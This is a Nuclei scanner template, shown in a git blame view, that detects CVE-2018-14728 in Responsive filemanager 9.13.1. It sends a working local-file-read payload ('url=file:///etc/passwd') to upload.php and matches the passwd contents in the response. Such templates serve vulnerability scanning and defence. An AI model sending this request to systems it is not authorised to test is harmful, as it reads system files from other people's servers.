nuclei-templates/cves/CVE-2018-14728.yaml

20 lines
334 B
YAML
Raw Normal View History

2020-04-08 12:34:50 +00:00
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
2020-05-25 07:49:06 +00:00
severity: high
2020-04-08 12:34:50 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
2020-05-25 07:49:06 +00:00
body: "fldr=&url=file:///etc/passwd"
2020-04-08 12:34:50 +00:00
matchers:
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-08 12:34:50 +00:00
part: body